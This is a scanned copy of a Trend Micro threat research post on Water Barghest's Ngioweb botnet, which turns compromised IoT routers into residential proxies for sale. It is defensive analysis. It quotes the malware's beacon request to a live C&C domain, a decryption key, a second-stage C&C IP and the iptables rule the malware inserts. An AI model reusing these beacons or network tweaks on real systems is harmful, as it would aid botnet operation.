www.trendmicro.com
Open in
urlscan Pro
104.75.88.135
Public Scan
URL:
https://www.trendmicro.com/en_us/research/24/k/water-barghest.html
Submission Tags: @nominet_threat_intel feedly-filtered-v1.0 reference_article_link confidence_null cluster_55397611 Search All
Submission: On November 18 via api from GB — Scanned from GB
Submission Tags: @nominet_threat_intel feedly-filtered-v1.0 reference_article_link confidence_null cluster_55397611 Search All
Submission: On November 18 via api from GB — Scanned from GB
Form analysis 1 forms found in the DOM
<form class="main-menu-search" aria-label="Search Trend Micro">
<div class="main-menu-search__field-wrapper" id="cludo-search-form">
<table class="gsc-search-box">
<tbody>
<tr>
<td class="gsc-input">
<input type="text" class="gsc-input-field" name="search" title="search" placeholder="Search" autocomplete="off" aria-label="search">
</td>
</tr>
</tbody>
</table>
</div>
</form>Text Content
Business
search close
* Solutions
* By Challenge
* By Challenge
* By Challenge
Learn more
* Understand, Prioritize & Mitigate Risks
* Understand, Prioritize & Mitigate Risks
Improve your risk posture with attack surface management
Learn more
* Protect Cloud-Native Apps
* Protect Cloud-Native Apps
Security that enables business outcomes
Learn more
* Protect Your Hybrid World
* Protect Your Hybrid, Multi-Cloud World
Gain visibility and meet business needs with security
Learn more
* Securing Your Borderless Workforce
* Securing Your Borderless Workforce
Connect with confidence from anywhere, on any device
Learn more
* Eliminate Network Blind Spots
* Eliminate Network Blind Spots
Secure users and key operations throughout your environment
Learn more
* See More. Respond Faster.
* See More. Respond Faster.
Move faster than your adversaries with powerful purpose-built XDR,
attack surface risk management, and zero trust capabilities
Learn more
* Extend Your Team
* Extend Your Team. Respond to Threats Agilely
Maximize effectiveness with proactive risk reduction and managed
services
Learn more
* Operationalizing Zero Trust
* Operationalizing Zero Trust
Understand your attack surface, assess your risk in real time, and
adjust policies across network, workloads, and devices from a single
console
Learn more
* By Role
* By Role
* By Role
Learn more
* CISO
* CISO
Drive business value with measurable cybersecurity outcomes
Learn more
* SOC Manager
* SOC Manager
See more, act faster
Learn more
* Infrastructure Manager
* Infrastructure Manager
Evolve your security to mitigate threats quickly and effectively
Learn more
* Cloud Builder and Developer
* Cloud Builder and Developer
Ensure code runs only as intended
Learn more
* Cloud Security Ops
* Cloud Security Ops
Gain visibility and control with security designed for cloud
environments
Learn more
* By Industry
* By Industry
* By Industry
Learn more
* Healthcare
* Healthcare
Protect patient data, devices, and networks while meeting regulations
Learn more
* Manufacturing
* Manufacturing
Protecting your factory environments – from traditional devices to
state-of-the-art infrastructures
Learn more
* Oil & Gas
* Oil & Gas
ICS/OT Security for the oil and gas utility industry
Learn more
* Electric Utility
* Electric Utility
ICS/OT Security for the electric utility
Learn more
* Federal
* Federal
Learn more
* Automotive
* Automotive
Learn more
* 5G Networks
* 5G Networks
Learn more
* Small & Midsized Business Security
* Small & Midsized Business Security
Stop threats with easy-to-use solutions designed for your growing
business
Learn more
* Platform
* Vision One Platform
* Vision One Platform
* Trend Vision One
Our Unified Platform
Bridge threat protection and cyber risk management
Learn more
* AI Companion
* Trend Vision One Companion
Your generative AI cybersecurity assistant
Learn more
* Attack Surface Management
* Attack Surface Management
Stop breaches before they happen
Learn more
* XDR (Extended Detection & Response)
* XDR (Extended Detection & Response)
Stop adversaries faster with a broader perspective and better context to
hunt, detect, investigate, and respond to threats from a single platform
Learn more
* Cloud Security
* Cloud Security
* Trend Vision One™
Cloud Security Overview
The most trusted cloud security platform for developers, security
teams, and businesses
Learn more
* Attack Surface Risk Management for Cloud
* Attack Surface Risk Management for Cloud
Cloud asset discovery, vulnerability prioritization, Cloud Security
Posture Management, and Attack Surface Management all in one
Learn more
* XDR for Cloud
* XDR for Cloud
Extend visibility to the cloud and streamline SOC investigations
Learn more
* Workload Security
* Workload Security
Secure your data center, cloud, and containers without compromising
performance by leveraging a cloud security platform with CNAPP
capabilities
Learn more
* Container Security
* Container Security
Simplify security for your cloud-native applications with advanced
container image scanning, policy-based admission control, and container
runtime protection
Learn more
* File Security
* File Security
Protect application workflow and cloud storage against advanced threats
Learn more
* Endpoint Security
* Endpoint Security
* Endpoint Security Overview
Defend the endpoint through every stage of an attack
Learn more
* XDR for Endpoint
* XDR for Endpoint
Stop adversaries faster with a broader perspective and better context
to hunt, detect, investigate, and respond to threats from a single
platform
Learn more
* Workload Security
* Workload Security
Optimized prevention, detection, and response for endpoints, servers,
and cloud workloads
Learn more
* Industrial Endpoint Security
* Industrial Endpoint Security
Learn more
* Mobile Security
* Mobile Security
On-premises and cloud protection against malware, malicious
applications, and other mobile threats
Learn more
* Network Security
* Network Security
* Network Security Overview
Expand the power of XDR with network detection and response
Learn more
* XDR for Network
* XDR for Network
Stop adversaries faster with a broader perspective and better context
to hunt, detect, investigate, and respond to threats from a single
platform
Learn more
* Network Intrusion Prevention (IPS)
* Network Intrusion Prevention (IPS)
Protect against known, unknown, and undisclosed vulnerabilities in your
network
Learn more
* Breach Detection System (BDS)
* Breach Detection System (BDS)
Detect and respond to targeted attacks moving inbound, outbound, and
laterally
Learn more
* Secure Service Edge (SSE)
* Secure Service Edge (SSE)
Redefine trust and secure digital transformation with continuous risk
assessments
Learn more
* 5G Network Security
* 5G Network Security
Learn more
* Industrial Network Security
* Industrial Network Security
Learn more
* Email Security
* Email Security
* Email Security
Stop phishing, malware, ransomware, fraud, and targeted attacks from
infiltrating your enterprise
Learn more
* Email and Collaboration Security
* Trend Vision One™
Email and Collaboration Security
Stop phishing, ransomware, and targeted attacks on any email service
including Microsoft 365 and Google Workspace
Learn more
* OT Security
* OT Security
* OT Security
Learn about solutions for ICS / OT security.
Learn more
* XDR for OT
* XDR for OT
Stop adversaries faster with a broader perspective and better context
to hunt, detect, investigate, and respond to threats from a single
platform
Learn more
* Industrial Network Security
* Industrial Network Security
Industrial Network Security
* Industrial Endpoint Security
* Industrial Endpoint Security
Learn more
* Threat Insights
* Threat Insights
See threats coming from miles away
Learn more
* Identity Security
* Identity Security
End-to-end identity security from identity posture management to
detection and response
Learn more
* On-Premises Data Sovereignty
* On-Premises Data Sovereignty
Prevent, detect, respond and protect without compromising data
sovereignty
Learn more
* All Products, Services, and Trials
* All Products, Services, and Trials
Learn more
* Research
* Research
* Research
* Research
Learn more
* Research, News, and Perspectives
* Research, News, and Perspectives
Learn more
* Research and Analysis
* Research and Analysis
Learn more
* Security News
* Security News
Learn more
* Zero Day Initiatives (ZDI)
* Zero Day Initiatives (ZDI)
Learn more
* Services
* Our Services
* Our Services
* Our Services
Learn more
* Service Packages
* Service Packages
Augment security teams with 24/7/365 managed detection, response, and
support
Learn more
* Managed XDR
* Managed XDR
Augment threat detection with expertly managed detection and response
(MDR) for email, endpoints, servers, cloud workloads, and networks
Learn more
* Incident Response
* Incident Response
* Incident Response
Our trusted experts are on call whether you're experiencing a breach
or looking to proactively improve your IR plans
Learn more
* Insurance Carriers and Law Firms
* Insurance Carriers and Law Firms
Stop breaches with the best response and detection technology on the
market and reduce clients’ downtime and claim costs
Learn more
* Support Services
* Support Services
Learn more
* Partners
* Partner Program
* Partner Program
* Partner Program Overview
Grow your business and protect your customers with the best-in-class
complete, multilayered security
Learn more
* Partner Competencies
* Partner Competencies
Stand out to customers with competency endorsements that showcase your
expertise
Learn more
* Partner Successes
* Partner Successes
Learn more
* Managed Security Service Provider
* Managed Security Service Provider
Deliver modern security operations services with our industry-leading
XDR
Learn more
* Managed Service Provider
* Managed Service Provider
Partner with a leading expert in cybersecurity, leverage proven
solutions designed for MSPs
Learn more
* Alliance Partners
* Alliance Partners
* Alliance Partners
We work with the best to help you optimize performance and value
Learn more
* Technology Alliance Partners
* Technology Alliance Partners
Learn more
* Find Alliance Partners
* Find Alliance Partners
Learn more
* Partner Resources
* Partner Resources
* Partner Resources
Discover resources designed to accelerate your business’s growth and
enhance your capabilities as a Trend Micro partner
Learn more
* Partner Portal Login
* Partner Portal Login
Login
* Trend Campus
* Trend Campus
Accelerate your learning with Trend Campus, an easy-to-use education
platform that offers personalized technical guidance
Learn more
* Co-Selling
* Co-Selling
Access collaborative services designed to help you showcase the value
of Trend Vision One™ and grow your business
Learn more
* Become a Partner
* Become a Partner
Learn more
* Distributors
* Distributors
Learn more
* Find Partners
* Find Partners
Locate a partner from whom you can purchase Trend Micro solutions
Learn more
* Company
* Why Trend Micro
* Why Trend Micro
* Why Trend Micro
Learn more
* Customer Success Stories
* Customer Success Stories
Learn more
* The Human Connection
* The Human Connection
Learn more
* Industry Accolades
* Industry Accolades
Learn more
* Strategic Alliances
* Strategic Alliances
Learn more
* Compare Trend Micro
* Compare Trend Micro
* Compare Trend Micro
See how Trend outperforms the competition
Let's go
* vs. Crowdstrike
* Trend Micro vs. Crowdstrike
Crowdstrike provides effective cybersecurity through its cloud-native
platform, but its pricing may stretch budgets, especially for
organizations seeking cost-effective scalability through a true single
platform
Let's go
* vs. Microsoft
* Trend Micro vs. Microsoft
Microsoft offers a foundational layer of protection, yet it often
requires supplemental solutions to fully address customers' security
problems
Let's go
* vs. Palo Alto Networks
* Trend Micro vs. Palo Alto Networks
Palo Alto Networks delivers advanced cybersecurity solutions, but
navigating its comprehensive suite can be complex and unlocking all
capabilities requires significant investment
Let's go
* About Us
* About Us
* About Us
Learn more
* Trust Center
* Trust Center
Learn more
* History
* History
Learn more
* Diversity, Equity and Inclusion
* Diversity, Equity and Inclusion
Learn more
* Corporate Social Responsibility
* Corporate Social Responsibility
Learn more
* Leadership
* Leadership
Learn more
* Security Experts
* Security Experts
Learn more
* Internet Safety and Cybersecurity Education
* Internet Safety and Cybersecurity Education
Learn more
* Legal
* Legal
Learn more
* Investors
* Investors
Learn more
* Formula E Racing
* Formula E Racing
Learn more
* Connect With Us
* Connect With Us
* Connect With Us
Learn more
* Newsroom
* Newsroom
Learn more
* Events
* Events
Learn more
* Careers
* Careers
Learn more
* Webinars
* Webinars
Learn more
Back
Back
Back
Back
* Free Trials
* Contact Us
Looking for home solutions?
Under Attack?
3 Alerts
Back
Unread
All
* Silent Threat: Red Team Tool EDRSilencer Disrupting Endpoint Security
Solutions
close
Learn more
* Gartner 2024 CNAPP Market Guide Insights for Leaders
close
Get insights
* 5 AI Security Takeaways featuring Forrester
close
Learn key strategies
Folio (0)
Support
* Business Support Portal
* Education and Certification
* Contact Support
* Find a Support Partner
Resources
* AI Security
* Trend Micro vs. Competition
* Cyber Risk Assessments
* What Is?
* Threat Encyclopedia
* Cyber Insurance
* Glossary of Terms
* Webinars
Log In
* Vision One
* Support
* Partner Portal
* Cloud One
* Product Activation and Management
* Referral Affiliate
Back
arrow_back
search
close
Content has been added to your Folio
Go to Folio (0) close
IoT
INSIDE WATER BARGHEST’S RAPID EXPLOIT-TO-MARKET STRATEGY FOR IOT DEVICES
In this blog entry, we discuss Water Barghest's exploitation of IoT devices,
transforming them into profitable assets through advanced automation and
monetization techniques.
By: Feike Hacquebord, Fernando Mercês November 18, 2024 Read time: 12 min (3329
words)
Save to Folio
Subscribe
--------------------------------------------------------------------------------
SUMMARY
* Water Barghest, which comprised over 20,000 IoT devices by October 2024,
monetizes IoT devices by exploiting vulnerabilities and quickly enlisting
them for sale on a residential proxy marketplace.
* Its botnet uses automated scripts to find and compromise vulnerable IoT
devices sourced from public internet scan databases like Shodan.
* Once IoT devices are compromised, the Ngioweb malware is deployed, which runs
in memory and connects to command-and-control servers to register the
compromised device as a proxy.
* The monetization process, from initial infection to the availability of the
device as a proxy on a residential proxy marketplace, can take as little as
10 minutes, indicating a highly efficient and automated operation.
There is a big incentive for both espionage motivated actors and financially
motivated actors to set up proxy botnets. These can serve as an anonymization
layer, which can provide plausibly geolocated IP addresses to scrape contents of
websites, access stolen or compromised online assets, and launch cyber-attacks.
Examples of proxy botnets set up by advanced persistent threat (APT) actors are
the VPNFilter botnet and Cyclops Blink, both deployed by Sandworm and disrupted
by the Federal Bureau of Investigation (FBI) in 2018 and 2022, respectively.
Another example is the SOHO botnet alleged to be operated by a Chinese company
called the Beijing Integrity Technology Group; this botnet was disrupted in
September 2024 by the FBI. The cybercriminal group Water Zmeu had a proxy botnet
primarily consisting of Ubiquiti EdgeRouter devices, which was used by nation
state actor Pawn Storm (also known as APT28 and Forest Blizzard) for two years
for their espionage campaigns.
In this blog entry, we discuss our findings on another proxy botnet we associate
with Water Barghest’s intrusion set. This botnet was estimated to have more than
20,000 compromised Internet-of-Things (IoT) devices in October 2024. The
starting point of our discovery of Water Barghest’s intrusion set was our
decade-old research into nation state actor Pawn Storm. Many Ubiquiti EdgeRouter
devices had been used by this nation state actor since April 2022 in their
espionage campaigns. Ubiquiti routers were the source of spear-phishing e-mails
to numerous government organizations all over the world; they were used as SMB
reflectors in NTLMv2 hash relay attacks, and they served as proxies to send
stolen credentials on phishing websites to upstream servers.
In January 2024, the FBI tried to stop these espionage campaigns by disrupting
the third-party criminal router botnet that Pawn Storm was using. We associate
this router botnet that consisted primarily of Ubiquiti EdgeRouter devices with
the Water Zmeu intrusion set. During our investigation, we got our hands on a
couple of the EdgeRouter devices that had been used by Pawn Storm, and we indeed
found traces of espionage campaigns, and the router malware of Water Zmeu. We
also found mysterious processes running in memory only, called um or mm. These
processes appeared to be instances of Ngioweb malware running in memory, and
this led us to the discovery of the Ngioweb botnet of Water Barghest.
Apparently, some cybercriminals and APT actors share compromised infrastructure
knowingly or unknowingly.
For more than five years, no significant publications were done on the Ngioweb
botnet of Water Barghest while the botnet was up and running. This means that
the actor group behind Water Barghest managed to keep a low profile. Like
several other cybercriminals, Water Barghest did not make headlines in the news
because of their careful operational security and high degree of automation.
They had a steady income fueled by their cybercriminal activities, but they did
not get the scrutiny they deserved. They quietly erased log files from their
servers and made forensic analysis more difficult. They removed human error from
their operations by automating almost everything. They also removed financial
traceability by using cryptocurrency for anonymous payments.
However, they slipped up and suddenly had the spotlight pointed on them. This
was because of a misjudgment, an operational mistake, or by using a
vulnerability that made them greedy. One example of this is the well-mediatized
usage of the zero-day vulnerability that was used against Cisco IOS XE devices
in October 2023. Tens of thousands of Cisco routers were affected, and
naturally, this sparked the interest of the security industry. We, too, became
interested in the ever-intriguing question of whodunnit, and ultimately, we
solved it at the technical level: We found that the attackers’ infrastructure
that was used to compromise thousands of Cisco IOS XE routers belonged to the
five-year-old intrusion set of Water Barghest. This makes it very plausible that
it was the Water Barghest group who had used the Cisco IOS XE device zero-day in
October 2023.
And yet, even without the seemingly reckless usage of the Cisco IOS XE zero-day
against tens thousands of routers, we would have discovered Water Barghest’s
router botnet operations anyway through our decade-long research into Pawn Storm
as mentioned above. A series of seemingly unrelated events led us to the
discovery of the way Water Barghest had automated every step between finding
vulnerable routers and IoT devices on the internet, exploiting these devices,
uploading and executing malware on them, and then monetizing the compromised
assets for a steady income on an online marketplace of residential proxies.
One of the striking characteristics of the Water Barghest botnet is its high
degree of automation, which will be discussed in the following section.
WATER BARGHEST’S AUTOMATION
Figure 1. Automation by Water Barghest: from using IoT exploits to monetizing
IoT bots on a residential proxy marketplace
download
As far as we know, apart from acquiring IoT exploits, Water Barghest has
automated each step between finding vulnerable IoT devices and putting them for
sale on a residential proxy marketplace (Figure 1). However, it all starts with
acquiring IoT device vulnerabilities: Oftentimes these will be n-days, but in at
least one case Water Barghest utilized a zero-day. With a list of exploits in
hand, Water Barghest uses search queries on a publicly available Internet scan
database like Shodan to find vulnerable devices and their IP addresses.
After retrieving these IP addresses, Water Barghest uses a set of data-center IP
addresses with an oftentimes big longevity to try the exploits against
potentially vulnerable IoT devices. When an exploit is successful, the
compromised IoT devices download a script that iterates through Ngioweb malware
samples that are compiled for different Linux architectures. When one of the
samples runs fine, the malware Ngioweb will run in memory on the victim’s IoT
device. This means that the infection is not persistent; a reboot would remove
the infection. When Ngioweb runs, it will register with a command-and-control
(C&C) server. Oftentimes, within minutes the bot will receive instructions to
connect to one of the residential proxy provider’s 150 entry points (Figure 2).
A speed test and name server test will follow, and the information will be sent
to and be listed on the marketplace. The whole procedure between initial
infection and making the bot available as a proxy on the marketplace may take no
longer than 10 minutes. This shows again the professionalism and maturity of
this threat actor, who has been around for more than five years.
Figure 2. Estimated breakdown of the residential proxy provider’s proxies by
device type, based on 2,900 IP addresses we verified to be exit nodes of the
marketplace at the end of October 2024
download
At the time of writing, Water Barghest deploys about 17 workers on virtual
private servers (VPS) that continuously scan routers and IoT devices for known
vulnerabilities. The same workers are also used to upload Ngioweb malware to
freshly compromised IoT devices. Water Barghest has probably been using this
mode of operation for years, with the worker IP addresses changing slowly over
time. This setup allowed for a steady income for Water Barghest for years.
NGIOWEB MALWARE EVOLUTION
2018: Ramnit-powered Windows botnet
The Ngioweb malware strain goes back to 2018, when Check Point Research revealed
it was being dropped by a Ramnit Trojan. At the time, Ngioweb targeted computers
using the Microsoft Windows operating system. The malware was already designed
for turning an infected machine into a malicious proxy server. A few samples
even go back to 2017, but the command-and-control (C&C) domain that gives the
malware name was registered in 2018: ngioweb[.]su. If you're curious about the
.su top-level domain (TLD), it’s associated with the Soviet Union, and although
the USSR doesn’t exist anymore, the TLD is still valid.
2019: WordPress servers botnet
In 2019, Netlab researchers found the Linux variant of Ngioweb. The malware
worked similarly to its previous Windows version, but it had domain generation
algorithm (DGA) features added. According to Netlab, the botnet was built mostly
of web servers with WordPress installed, which suggests the threat actor could
be exploiting a WordPress – or a WordPress plugin – vulnerability.
One of the parameters sent to the first stage C&C server was the ‘sv’ parameter
(likely short for “software version”), which contained the value 5003. Just like
its Windows version, Ngioweb used two-stage C&C servers and implemented its own
binary protocol over TCP for communicating with the second-stage C&C server.
2020: IoT devices botnet
In 2020, Water Barghest changed their targets to IoT devices. We found Ngioweb
samples compiled for many different architectures. Additionally, Netlab
published a blog entry and Intezer posted on X about a live Ngioweb botnet.
According to Netlab, the threat actor was exploiting nine different n-day
vulnerabilities in IoT devices; this included NAS devices from QNAP and Netgear,
but also D-Link devices, among others. The software version defined at the ‘sv’
field was changed to 0005.The software version defined at the ‘sv’ field was
changed to 0005.
2024: Expanded targets
In 2024, we saw the IoT botnet created by Water Barghest at its full potential.
The processes we found running in a bunch of EdgeRouter devices turned out to be
a new version of Ngioweb. It works very similarly to its previous versions. When
running, the malware performs the following actions:
* Initialize function pointers in runtime, which makes static analysis harder.
* Ignore any ignorable signals received by the kernel.
* Renames itself to “[kworker/0:1]” in a tentative to look like a kernel thread
in the process list.
* Closes stdin, stdout, and stderr file descriptors to prevent any error
reporting.
* Disables kernel’s watchdog, effectively preventing it from rebooting the
device.
* Reads the contents of /etc/machine-id (will be sent to the first-stage C&C
later).
* Decrypts its AES-256-ECB (no padding) encrypted configuration.
* Generates and tries to resolve the DGA domains of the first-stage C&C.
Its main function is shown in Figure 3.
Figure 3. Ngioweb’s main function
download
The encrypted configuration is usually at the beginning of the .data section. In
the following sample the key is at offset 0x0c from the start of the .data
section and the encrypted data blob is 512 byte in size (Figure 4).
Figure 4. AES key and encrypted data
download
The encrypted configuration includes the ‘sv’ value, DGA seed and count, and C&C
URL path, among other settings we didn’t fully analyze. Figure 5 shows a
decrypted configuration with highlighted values of ‘sv’, DGA seed and count, C&C
port and C&C URL path, respectively.
Figure 5. Decrypted configuration
download
We’ve also created a Python script to decrypt Ngioweb samples configuration,
which is available in our GitHub repository. The following is an example output:
> PS D:\ > python ngioweb_config_extractor.py c267e0
> [DEBUG] AES key found at offset 0xc from .data section
> AES key (hex):
> db1f96b20679f9fb9cbd96b242ab8530102c0105b64c83c3ae544f87594a6fa9
> DGA seed (hex): 0221d333
> DGA count: 1000
> URL path: /jquery.js
> sv: 271a
For every generated domain the malware tries to resolve with A/AAAA requests, it
also sends a TXT request expecting a base64-encoded binary blob (Figures 6 and
7).
Figure 6. First-stage C&C response for a DNS TXT request
download
Figure 7. First-stage C&C response for a DNS TXT request
download
Unfortunately, we didn’t finish the full analysis of how this binary blob is
used. Nonetheless, the next stage is to send a GET request to the C&C server.
Like its previous versions, this request is an unencrypted request at port
443/tcp and contains some base64-encoded data that identifies the victim:
> GET
> /jquery.js?h=aWQ9MDEyMzQ1Njc4OWFiY2RlZiZ2PWFybXY3bCZzdj0yNzFhJnlic25xbndmYXR5anV0c2w=
> HTTP/1.1\r\n
> Host: ultradomafy.net\r\n
> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101
> Firefox/59.0\r\n
> Accept: text/html\r\n
> Connection: close\r\n
> \r\n
The sample base64-decoded data is as follows:
> id=0123456789abcdef&v=armv7l&sv=271a&ybsnqnwfatyjutsl
* id - first 16 characters from /etc/machine-id
* v - architecture of the infected device
* sv - software version (assumed)
* <random string with 16 lowercase letters>
In this version, the ‘sv’ parameter changed to 271a.
The first-stage C&C server response has the following format:
> HTTP/1.1 200 OK\r\n
> Server: openresty/1.19.9.1\r\n
> Date: Mon, 11 Mar 2024 23:23:47 GMT\r\n
> Content-Type: text/plain; charset=utf-8\r\n
> Content-Length: 8\r\n
> Connection: close\r\n
> \r\n
> WAIT 60\n
The above response contains the WAIT command, which instructs the malware to
wait a few seconds before querying the C&C server again. Its parameter is the
number of seconds to wait for (60 in the example).
Supported commands are:
* WAIT
* CONNECT
* DISCONNECT
* CERT
This is paired with previous versions.
Different child processes check if the following iptables rule is present:
iptables -I INPUT -p tcp --tcp-flags RST RST -j DROP --sport 5000:55000
If the rule is not already active in netfilter, the malware adds it. We believe
this is to prevent connection resets, ensuring its communication channels remain
open.
After waiting 60 seconds, the malware might get a different answer, as shown in
Figure 8:
Figure 8. Malware receives three commands: CONNECT, CERT, and WAIT
download
This instructs the malware to connect to a second-stage C&C, 195.154.43.182 in
this case. We associate this second-stage IP address with one of the about 150
entry nodes of the residential proxy service.
Before publishing the new victim’s IP address for sale as a reverse proxy on the
residential proxy marketplace’s website, the malware downloads a big file
containing random bytes from the second-stage C&C (Figure 9).
Figure 9. File downloaded from second-stage C&C
download
This is to estimate the victim’s bandwidth, which we believe will be used to
calculate the final price on the residential proxy marketplace.
In this version, Water Barghest expanded Ngioweb’s list of targeted IoT devices,
which now includes IoT devices from more brands, such as:
* Cisco
* DrayTek
* Fritz!Box
* Linksys
* Netgear
* Synology
* Tenda
* Western Digital
* Zyxel
Water Barghest has been targeting devices from the brands above with a range of
n-day vulnerabilities and lots of old ones.
RESIDENTIAL PROXY MARKETPLACE
In our assessment, a significant part of the exit nodes that a particular
residential proxy marketplace offers for rent belong to devices that are
infected with Ngioweb malware. In a couple of cases, we were able to verify that
a fresh Ngioweb infection resulted in the corresponding IP address being offered
for rent on the marketplace’s website within a few minutes after the initial
infection (Figure 10). The residential proxy provider allows for cryptocurrency
payments only.
Figure 10. Residential proxy marketplace’s website
download
As far as we can tell, the proxies on the residential proxy marketplace (Figure
11) are back connect proxies. Ngioweb bots are instructed to connect to one of
about 150 datacenter IP addresses we associate with the marketplace that are
also used as second-stage C&C of Ngioweb-infected devices. Paying users of the
residential proxy service can then connect to a temporary high TCP port on one
of the 150 datacenter IP addresses, and then route traffic through the Ngioweb
bots.
Figure 11. Breakdown of proxies by country according to the residential proxy
marketplace‘s website. Data checked in October 2024.
download
We were able to explicitly enumerate a significant part of the marketplace’s
residential proxy network over time and verify that Ngioweb bots were added to
the marketplace’s offerings within 10 minutes after initial infection.
OUTLOOK AND CONCLUSIONS
For years, mid-sized proxy botnets have existed without them being disrupted and
published on. Examples are the botnets we associate with the Water Barghest and
Water Zmeu intrusion sets. The actor groups behind these intrusion sets have
made refinements in their setup over the years and automated their operations to
a high degree. Eventually, some of these botnets were brought to the attention
of the security industry. In the case of Water Barghest, this was because of the
use of Water Barghest’s infrastructure to deploy a zero-day against Cisco IOS XE
devices that infected tens of thousands of routers in October 2023. In the case
of Water Zmeu, APT actor Pawn Storm’s use of this criminal botnet for espionage
purposes motivated the FBI to disrupt the Water Zmeu-associated router botnet.
Upon completing our write-up on Water Barghest's activities, we became aware
of a LevelBlue blog entry that partially overlaps with our findings.
APT actors have also deployed their dedicated IoT botnets sometimes for years,
before they were disrupted by the FBI and its partners. APT actors and
financially motivated actors will continue to have an interest in building their
own IoT botnets for anonymization purposes and espionage. They also will
continue to use third-party botnets or commercially available residential proxy
services.
We expect that both the commercial market for residential proxy services and the
underground market of proxies will grow in the coming years, because the demand
from APT actors and cybercriminals actor groups is high. Protecting against
these anonymization layers is a challenge for many enterprises and government
organizations around the world. Court-approved disruptions of proxy botnets will
help put a dent into malign operations, but it is better to do something against
the source of the problem: securing IoT devices is of paramount importance, and
whenever possible, these devices should not be exposed to incoming connections
from the open internet.
Whenever an IoT device accepts incoming connections on the open internet,
commercial scanning services will quickly find them online, and malicious actors
can find them too via bought or stolen access to these internet scanning
services. Using internet scan data, the automated scripts of bad actors can
quickly try known vulnerabilities, and possibly even zero-days, against the
exposed IoT devices. In the case of Water Barghest, we have seen that the time
between exploiting an IoT device and putting them for sale on a residential
proxy marketplace can be as little as 10 minutes. Therefore, it is important not
to expose IoT devices to incoming internet connections whenever it is not
business-essential, and put mitigations in place to avoid their infrastructure
being part of the problem itself.
TREND MICRO VISION ONE THREAT INTELLIGENCE
To stay ahead of evolving threats, Trend Micro customers can access a range of
Intelligence Reports and Threat Insights within Trend Micro Vision One. Threat
Insights helps customers stay ahead of cyber threats before they happen and
better prepared for emerging threats. It offers comprehensive information on
threat actors, their malicious activities, and the techniques they use. By
leveraging this intelligence, customers can take proactive steps to protect
their environments, mitigate risks, and respond effectively to threats.
Trend Micro Vision One Intelligence Reports App [IOC Sweeping]
Ngioweb IoCs used in Water Barghest Campaigns
Trend Micro Vision One Threat Insights App
Threat Actors: Water Barghest
Emerging Threats: Water Barghest’s Rapid Exploit-to-Market Strategy for IoT
Devices
HUNTING QUERIES
Trend Micro Vision One Search App
Trend Micro Vision Once Customers can use the Search App to match or hunt the
malicious indicators mentioned in this blog post with data in their
environment.
Detection of Ngioweb Malware
malName:*NGIOWEB* AND eventName:MALWARE_DETECTION
More hunting queries are available for Vision One customers with Threat Insights
Entitlement enabled.
INDICATORS OF COMPROMISE (IOCS)
The full list of IOCs can be found here. For DGA-generated domains, please refer
to this GitHub repository.
YARA RULES
As Ngioweb samples are highly obfuscated, an easy approach is to look for known
AES keys in .data section. However, it is possible to find samples without
section headers. In this case, searching for the AES key in the whole binary (or
in a loadable segment) does the job. There are also samples with an AES KEY
c91795b59248562e44d6c07526c7ab89dfe45344293703a94a3ae5ff02eab5a4 that we believe
could be part of some test, so we didn’t include them in our IOC list. The YARA
rules can be found here.
Tags
Articles, News, Reports | Threats | IoT
AUTHORS
* Feike Hacquebord
Sr. Threat Researcher
* Fernando Mercês
Sr. Threat Researcher
Contact Us
Subscribe
RELATED ARTICLES
* Unmasking Prometei: A Deep Dive Into Our MXDR Findings
* Trend Micro and Japanese Partners Reveal Hidden Connections Among SEO Malware
Operations
* Breaking Down Earth Estries' Persistent TTPs in Prolonged Cyber Operations
See all articles
Experience our unified platform for free
* Claim your 30-day trial
*
*
*
*
*
RESOURCES
* Blog
* Newsroom
* Threat Reports
* Find a Partner
*
*
SUPPORT
* Business Support Portal
* Contact Us
* Downloads
* Free Trials
*
*
ABOUT TREND
* About Us
* Careers
* Locations
* Upcoming Events
* Trust Center
*
Country Headquarters
Trend Micro - United States (US)
225 East John Carpenter Freeway
Suite 1500
Irving, Texas 75062
Phone: +1 (817) 569-8900
Select a country / region
United States expand_more
close
THE AMERICAS
* United States
* Brasil
* Canada
* México
MIDDLE EAST & AFRICA
* South Africa
* Middle East and North Africa
EUROPE
* België (Belgium)
* Česká Republika
* Danmark
* Deutschland, Österreich Schweiz
* España
* France
* Ireland
* Italia
* Nederland
* Norge (Norway)
* Polska (Poland)
* Suomi (Finland)
* Sverige (Sweden)
* Türkiye (Turkey)
* United Kingdom
ASIA & PACIFIC
* Australia
* Центральная Азия (Central Asia)
* Hong Kong (English)
* 香港 (中文) (Hong Kong)
* भारत गणराज्य (India)
* Indonesia
* 日本 (Japan)
* 대한민국 (South Korea)
* Malaysia
* Монголия (Mongolia) and рузия (Georgia)
* New Zealand
* Philippines
* Singapore
* 台灣 (Taiwan)
* ประเทศไทย (Thailand)
* Việt Nam
Privacy | Legal | Accessibility | Site map
Copyright ©2024 Trend Micro Incorporated. All rights reserved
Copyright ©2024 Trend Micro Incorporated. All rights reserved
sXpIBdPeKzI9PC2p0SWMpUSM2NSxWzPyXTMLlbXmYa0R20xk
This website uses cookies for website functionality, traffic analytics,
personalization, social media functionality and advertising. Our Cookie Notice
provides more information and explains how to amend your cookie settings.Learn
more
Cookies Settings Accept
✓
Thanks for sharing!
AddToAny
More…
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word
mmMwWLliI0fiflO&1
mmMwWLliI0fiflO&1
mmMwWLliI0fiflO&1
mmMwWLliI0fiflO&1
mmMwWLliI0fiflO&1
mmMwWLliI0fiflO&1
mmMwWLliI0fiflO&1
BDOW!